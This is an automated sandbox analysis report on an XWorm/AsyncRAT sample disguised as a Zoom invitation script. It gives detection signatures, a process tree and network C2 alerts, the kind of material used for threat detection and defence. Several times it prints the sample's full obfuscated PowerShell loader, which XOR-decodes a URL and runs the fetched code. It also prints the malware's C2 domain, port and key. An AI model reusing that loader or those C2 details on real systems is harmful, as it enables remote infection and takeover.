Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zoom_Invite.call-660194855683.wsf

Overview

General Information

Sample name:Zoom_Invite.call-660194855683.wsf
Analysis ID:1517940
MD5:e4895b941c8ea6d76630d6fcb2002292
SHA1:9e3038c82fd6767bfa224f361400fc89cd8d0d89
SHA256:2e63fec5163d85af2caf87e31459a0d6cca4cdb3d65a797e00a62b0c2b76acd7
Tags:AsyncRATRATwsfuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2800 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 3040 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3172 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 364 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 1416 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 3820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 2192 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2676 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3424 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": ["ALBANIAH3CKER.WORK.GD"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x691a:$cnc4: POST / HTTP/1.1
    0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: RegSvcs.exe PID: 3820JoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: RegSvcs.exe PID: 416JoeSecurity_XWormYara detected XWormJoe Security
          SourceRuleDescriptionAuthorStrings
          18.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            18.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6b1a:$cnc4: POST / HTTP/1.1

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 364, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ProcessId: 1416, ProcessName: powershell.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , ProcessId: 3040, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 364, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ProcessId: 1416, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf", ProcessId: 2800, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2800, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 ,
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-BXOR '0x1a' ) } )-JOIN'') ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zoom_Invite.call-660194855683.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2800, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = InvOkE-eXpreSSion ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 ,
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:27:27.981459+020028410751Malware Command and Control Activity Detected192.168.2.649710188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:02.698933+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:03.315694+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:14.101804+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:24.626314+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:32.951933+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:32.951985+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:35.297569+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:45.937994+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:56.803320+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:28:56.823213+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:00.615610+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:02.698223+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:09.000724+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:09.119549+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:09.610711+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:14.729201+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:20.438800+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:31.101677+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:32.721145+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:34.953706+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:45.910028+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:46.330771+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:52.235345+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:29:56.641561+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:00.482743+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:02.734815+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:09.219207+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:14.313512+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:14.432414+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:14.551473+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:19.741189+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:19.860217+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:30.454850+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:32.749519+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:40.484687+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:40.603772+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:41.469255+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:41.588134+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:45.207306+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:47.031208+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:52.218974+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:30:52.337501+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:02.484863+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:02.603546+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:02.722211+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:02.855550+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:10.032642+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:13.344305+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:24.000321+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:31.281086+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:32.747080+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            2024-09-25T09:31:34.828778+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.649719TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:03.317572+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:28:14.391747+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:28:24.629187+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:28:35.340957+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:28:45.940715+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:28:56.833284+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:00.617100+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:09.002768+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:09.121730+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:09.613558+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:14.731558+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:20.443067+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:31.118873+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:34.956480+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:45.912721+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:46.337966+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:52.236854+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:29:56.645080+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:00.484300+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:09.226240+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:14.315182+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:14.433951+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:14.553307+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:19.743870+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:19.861943+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:30.456643+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
            2024-09-25T09:30:40.519066+020028529231Malware Command and Control Activity Detected192.168.2.64971994.198.50.337000TCP
